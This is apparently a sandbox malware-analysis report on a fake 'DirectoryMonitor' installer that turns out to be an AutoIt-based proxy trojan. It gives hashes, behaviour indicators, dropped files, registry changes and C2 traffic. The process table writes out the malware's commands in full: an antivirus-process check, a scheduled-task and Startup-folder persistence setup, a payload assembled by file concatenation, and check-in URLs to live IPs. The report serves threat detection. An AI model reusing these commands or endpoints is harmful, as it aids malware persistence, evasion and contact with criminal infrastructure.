| File name: | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862 |
| Full analysis: | https://app.any.run/tasks/db3a8f53-9d90-4b64-8860-a4f8cdbde221 |
| Verdict: | Malicious activity |
| Analysis date: | May 31, 2024, 01:11:33 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive |
| MD5: | 2DEB7F86FD7F7B78FE5FD1885442F761 |
| SHA1: | F52F6AE76362CEEBBF54968B2465F5CBDB8D2227 |
| SHA256: | 2A9FFEA0C1F0F96E06F649AB7F045BA8EF2B9C6CA4DEE721A54B3C439D998862 |
| SSDEEP: | 98304:cMD+P0APWlL/cQBEf41atmJB/bpPET4bB18xZWO6u8NAcxoZf1dlTFnSQxnl+Hh/:9970ObFa2X |
MALICIOUS
Drops the executable file immediately after the start
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- Soa.pif (PID: 2024)
- cmd.exe (PID: 4016)
Antivirus name has been found in the command line (generic signature)
- findstr.exe (PID: 4048)
- findstr.exe (PID: 864)
Uses Task Scheduler to run other applications
- cmd.exe (PID: 1292)
Create files in the Startup directory
- cmd.exe (PID: 1772)
SUSPICIOUS
Executing commands from ".cmd" file
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
Starts CMD.EXE for commands execution
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- cmd.exe (PID: 4016)
Reads the Internet Settings
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
Reads security settings of Internet Explorer
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
Get information on the list of running processes
- cmd.exe (PID: 4016)
Using 'findstr.exe' to search for text patterns in files and output
- cmd.exe (PID: 4016)
Drops a file with a rarely used extension (PIF)
- cmd.exe (PID: 4016)
- Soa.pif (PID: 2024)
Application launched itself
- cmd.exe (PID: 4016)
Executable content was dropped or overwritten
- cmd.exe (PID: 4016)
- Soa.pif (PID: 2024)
Runs PING.EXE to delay simulation
- cmd.exe (PID: 4016)
Suspicious file concatenation
- cmd.exe (PID: 1876)
The executable file from the user directory is run by the CMD process
- Soa.pif (PID: 2024)
Starts application with an unusual extension
- cmd.exe (PID: 4016)
- wscript.exe (PID: 2280)
The process executes via Task Scheduler
- wscript.exe (PID: 2280)
Runs shell command (SCRIPT)
- wscript.exe (PID: 2280)
Connects to unusual port
- Soa.pif (PID: 1664)
INFO
Reads the computer name
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- Soa.pif (PID: 2024)
- wmpnscfg.exe (PID: 2052)
Checks supported languages
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- Soa.pif (PID: 2024)
- SnakeLink.pif (PID: 2268)
- Soa.pif (PID: 1664)
- wmpnscfg.exe (PID: 2052)
Creates files or folders in the user directory
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- Soa.pif (PID: 2024)
Reads mouse settings
- Soa.pif (PID: 2024)
- SnakeLink.pif (PID: 2268)
Manual execution by a user
- cmd.exe (PID: 1292)
- cmd.exe (PID: 1772)
- wmpnscfg.exe (PID: 2052)
- Soa.pif (PID: 1664)
Create files in a temporary directory
- Soa.pif (PID: 1664)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Win32 Executable MS Visual C++ (generic) (42.2) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (37.3) |
| .dll | | | Win32 Dynamic Link Library (generic) (8.8) |
| .exe | | | Win32 Executable (generic) (6) |
| .exe | | | Generic Win/DOS Executable (2.7) |
EXIF
EXE
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2020:08:01 02:42:47+00:00 |
| ImageFileCharacteristics: | No relocs, Executable, No line numbers, No symbols, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 6 |
| CodeSize: | 25088 |
| InitializedDataSize: | 119296 |
| UninitializedDataSize: | 1024 |
| EntryPoint: | 0x3312 |
| OSVersion: | 4 |
| ImageVersion: | 6 |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 2.1.0.0 |
| ProductVersionNumber: | 2.1.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| CompanyName: | DevEnterprise Software |
| FileDescription: | DevEnterprise.DirectoryMonitor.Setup.IstallHelper |
| FileVersion: | 2.1.0.0 |
| ProductVersion: | 2.1.0.0 |
| AssemblyVersion: | 2.1.0.0 |
Total processes
53
Monitored processes
18
Malicious processes
3
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 328 | ping -n 5 127.0.0.1 | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 864 | findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" | C:\Windows\System32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1292 | cmd /c schtasks.exe /create /tn "Squirt" /tr "wscript //B 'C:\Users\admin\AppData\Local\LinkGuard Dynamics\SnakeLink.js'" /sc minute /mo 5 /F | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1664 | "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\4461264\Soa.pif" | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\4461264\Soa.pif | explorer.exe | ||||||||||||
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Version: 3, 3, 14, 2 Modules
| |||||||||||||||
| 1772 | cmd /k echo [InternetShortcut] > "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SnakeLink.url" & echo URL="C:\Users\admin\AppData\Local\LinkGuard Dynamics\SnakeLink.js" >> "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SnakeLink.url" & exit | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1876 | cmd /c copy /b Begin + Predict + Forth + Failing + Totally + Accreditation + Quest + Textbooks + Reality + Competing + Moon + Enabled + Everyone + Mile + Verse + Dramatically + Link + Cindy + Speech + Hardcore + Adjustments + Eligible + Abc + Academy + Came + Basement + Island + Sagem + Smaller + Wild + Part + Ray + Listings + Stuff + Mpg + Indonesian + Computational + Edt + Lending + Monkey + Id + Displays + Monte + Hence 4461264\K | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2024 | 4461264\Soa.pif 4461264\K | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\4461264\Soa.pif | cmd.exe | ||||||||||||
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Version: 3, 3, 14, 2 Modules
| |||||||||||||||
| 2040 | findstr /V "SHEERFAIRLYCAMCORDERENEMIES" Marine | C:\Windows\System32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2052 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2108 | tasklist | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
4 185
Read events
4 177
Write events
8
Delete events
0
Modification events
| (PID) Process: | (3984) 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3984) 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3984) 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3984) 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
Executable files
2
Suspicious files
65
Text files
4
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Cube | binary | |
MD5:A011BBEFE9A50CCBF9C4DE483B3EF11C | SHA256:5215396DC0AD536537584E1998191576900BD0FE6AC96691212799F567A9D3A2 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Lending | binary | |
MD5:1B414AADBD28819DC35C480F5FFC76B6 | SHA256:3BF769CBF8CCAC131F2D270F0EAA014F1FEA037F80DDC62997C514C92DE797F2 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Everyone | binary | |
MD5:D55C96313B79536A45CE2CAF4ACF1ECE | SHA256:489EB2FE92D6C1F78486CC18BFF072771FC982E6EDA68522AF990E3E927246C1 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Monte | binary | |
MD5:706708698DFA48C5AB83C197B7B1A804 | SHA256:EB3E876F8613FE9162C052521CF36A465D453F37B751711C37C1429DB5113897 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Accreditation | binary | |
MD5:8A2AEA0B613B4ACDC123858DC214F152 | SHA256:0CAA514B771C22BEFCD471AC5319A3B8C4656614920B4C19EBEF0C4D7E05CD51 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Thursday | abr | |
MD5:9A387356342A959C743D6FFC1EBF4E4B | SHA256:78FBD8FD911C4E660B64D9CCFD5BAD8BD95B3B4CCB81BCFF8120214560BDE7AC | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Hence | binary | |
MD5:0D06A89D2878F9BB7D62BC65753339FB | SHA256:6361DE87254FECB4A82FEF356D6A9F404637FC81EAA3C0F24231FC38AA8A48FA | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Marine | binary | |
MD5:5F73F76F66973876FAC4DE7B5D4B5A0E | SHA256:D61C900B520353FBFBCB8B5332FBB5C1A805D175CE459781A1DDA307855F3030 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Monkey | binary | |
MD5:46E998A3615D732C7A2AD4CCD68745E8 | SHA256:8B862293015F60C666C7EEC142FCA50F12D5232D4CABF584B3523CD145209877 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Homepage | binary | |
MD5:8A4AA89D402FC26242A6BB74941EF5CA | SHA256:D9A2F4929AB37C1483AD5B06BD101EF7E6550E43E647734012F0D68F9D966EA4 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
9
DNS requests
1
Threats
13
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1664 | Soa.pif | GET | 429 | 195.2.70.38:30001 | http://195.2.70.38:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF | unknown | — | — | unknown |
1664 | Soa.pif | GET | 429 | 91.142.74.28:30001 | http://91.142.74.28:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF | unknown | — | — | unknown |
1664 | Soa.pif | GET | 200 | 77.238.224.56:30001 | http://77.238.224.56:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1664 | Soa.pif | 195.2.70.38:30001 | — | Hosting technology LTD | RU | unknown |
1664 | Soa.pif | 91.142.74.28:30001 | — | VIP-TELECOM-SERVICE Ltd. | RU | unknown |
1664 | Soa.pif | 77.238.245.11:30001 | — | Tele.RU Ltd. | RU | unknown |
1664 | Soa.pif | 77.238.224.56:30001 | — | Tele.RU Ltd. | RU | unknown |
1664 | Soa.pif | 91.142.73.198:14930 | — | VIP-TELECOM-SERVICE Ltd. | RU | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
oIisZULlamRX.oIisZULlamRX |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | A Network Trojan was detected | PROXY [ANY.RUN] GoProxy Check-in |
— | — | A Network Trojan was detected | PROXY [ANY.RUN] GoProxy Check-in |
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | A Network Trojan was detected | PROXY [ANY.RUN] GoProxy Check-in |
7 ETPRO signatures available at the full report